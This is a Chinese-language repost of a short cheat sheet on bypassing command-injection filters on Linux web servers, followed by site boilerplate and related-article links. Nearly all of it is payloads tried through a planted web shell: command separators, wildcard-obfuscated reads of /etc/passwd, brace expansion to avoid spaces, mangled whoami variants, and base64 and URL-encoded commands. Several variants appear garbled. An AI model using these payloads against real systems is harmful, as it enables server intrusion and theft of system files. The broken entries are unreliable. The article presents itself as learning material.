Linux命令執行Bypass常見姿勢
?0x00寫在前面
本次測試僅供學習使用,如若非法他用,與平臺和本文作者無關,需自行負責!
?0x01實踐演示
部署服務器端為Linux系統的http服務,留存get和post方式的一句話木馬,用于命令執行測試。(測試思路可以對話Chatgpt)
linux邏輯運算符
; //分號
| //僅執行后面那條命令
|| //僅執行前面那條命令
& //兩條命令都會執行
%0a //換行符 %0d //回車符
利用通配符
通配符"?"代表任意一個字符,"*"代表任意個字符
cat%20/etc/pa??wd
cat%20/etc/pa?*wd
嘗試
cat /*****et*c*/*pas**************************************************swd
結合上述方式進行組合bypass
echo mt ; whoami
使用大括號來繞過空格的限制
{cat,/etc/passwd}
{ls,-alth}
命令混淆
whoami
1oami
@ami
*mi
命令變形
/*/bin/wh*mi
/us*/*in/who*mi
/*s?/*?n/w?o*i
base64編碼方式進行
echo id|base64
echo id|base64
URL編碼
%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b
審核編輯 :李倩
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。
舉報投訴
-
Linux
+關注
關注
87文章
11316瀏覽量
209812 -
服務器
+關注
關注
12文章
9225瀏覽量
85616 -
邏輯運算
+關注
關注
0文章
56瀏覽量
9769
原文標題:Linux命令執行Bypass常見姿勢
文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
相關推薦
嵌入式Linux開發教程:Linux常見命令(上篇)
摘要:這是對周立功編著的《嵌入式Linux開發教程》的第7期連載。本期刊載內容有關LinuxLinux常見命令中的導航命令、目錄命令和文件
發表于 10-21 13:36
?11次下載
linux技術:WAF運行命令執行方法
如果命令執行的時候遇到攔截命令關鍵詞的時候可以利用如下方法繞過: "和^是CMD命令中最常見的轉義字符,還有成對的括號并不會影響
發表于 11-07 20:27
?998次閱讀
Linux命令執行Bypass常見姿勢介紹
部署服務器端為Linux系統的http服務,留存get和post方式的一句話木馬,用于命令執行測試。(測試思路可以對話Chatgpt)
linux命令和shell編程有什么聯系
Linux命令和Shell編程之間存在密切的聯系。 首先,Shell是Linux命令行下的解釋器,它提供了一個用戶界面,使用戶能夠與Linux
linux中source命令的用法
在Linux中,source命令通常用于重新執行剛修改的初始化文件,使之立即生效,而不必注銷并重新登錄。source命令可以用于讀取并執行腳
linux重啟命令有哪些
Linux是一種自由和開放源代碼的操作系統,被廣泛應用于服務器和嵌入式設備。在Linux中,有多種命令用于重啟系統。在本文中,我們將詳細介紹常用的Linux重啟
總結linux命令行的主要用法
Linux命令行是一種在Linux操作系統中通過文本界面來執行指令和管理系統的方式。它提供了豐富的功能和靈活性,幫助用戶完成各種任務。本文將詳細介紹
uboot命令的執行過程是什么
U-boot是通過執行u-boot提供的命令來加載Linux內核的,其中 命令bootm的功能 即為從memory啟動Linux內核映像文件
bypass電容多大 bypass電容怎么計算
Bypass電容的大小和計算方法 Bypass電容是一種常見的電子元件,用于繞過或降低電路中的噪聲、干擾或漏磁磁通。它能夠有效地將高頻噪聲或漏磁磁通通過一個低阻抗路徑繞過,從而保持電路的穩定性和信號
工商網監
評論